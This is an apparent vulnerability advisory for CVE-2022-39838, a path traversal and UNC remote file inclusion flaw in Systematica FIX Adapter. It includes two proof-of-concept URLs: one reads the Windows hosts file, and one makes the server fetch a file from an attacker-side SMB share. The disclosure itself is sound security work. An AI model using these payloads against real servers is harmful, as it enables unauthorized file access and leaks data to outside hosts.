Headline
CVE-2022-39838: GitHub - jet-pentest/CVE-2022-39838
Systematic FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 allows remote file inclusion via a UNC share pathname, and also allows absolute path traversal to local pathnames.
CVE-2022-39838****[Suggested description]
Systematica FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 allows remote file inclusion via a UNC share pathname, and also allows absolute path traversal to local pathnames.
[Additional Information]
PoC:
http://192.168.88.11:8888/info?page=logfile&file=C:\Windows\System32\drivers\etc\hosts
http://192.168.88.11:8888/info?page=logfile&file=\\192.168.88.100\rfi\test.txt
[Vulnerability Type]
Incorrect Access Control
[Vendor of Product]
Systematica
[Affected Product Code Base]
Systematica FIX Adapter (ALFAFX) - 2.4.0.25 (Build 13/09/2017)
[Attack Type]
Remote
[Impact Information Disclosure]
true
[Attack Vectors]
Remote user can get access to arbitrary file in the OS via absolute path. Also remote user can compel vulnerable server to request file from another machine over smb.
[Discoverer]
Ivashchenko Sergey (Jet Infosystems, jet.su)
[Reference]
http://systematicalpha.com/company
Related news
Absolute path traversal vulnerability in the Systematica SMTP Adapter component (up to v2.0.1.101) in Systematica Radius (up to v.3.9.256.777) allows remote attackers to read arbitrary files via a full pathname in GET parameter "file" in URL. Also: affected components in same product - HTTP Adapter (up to v.1.8.0.15), MSSQL MessageBus Proxy (up to v.1.1.06), Financial Calculator (up to v.1.3.05), FIX Adapter (up to v.2.4.0.25)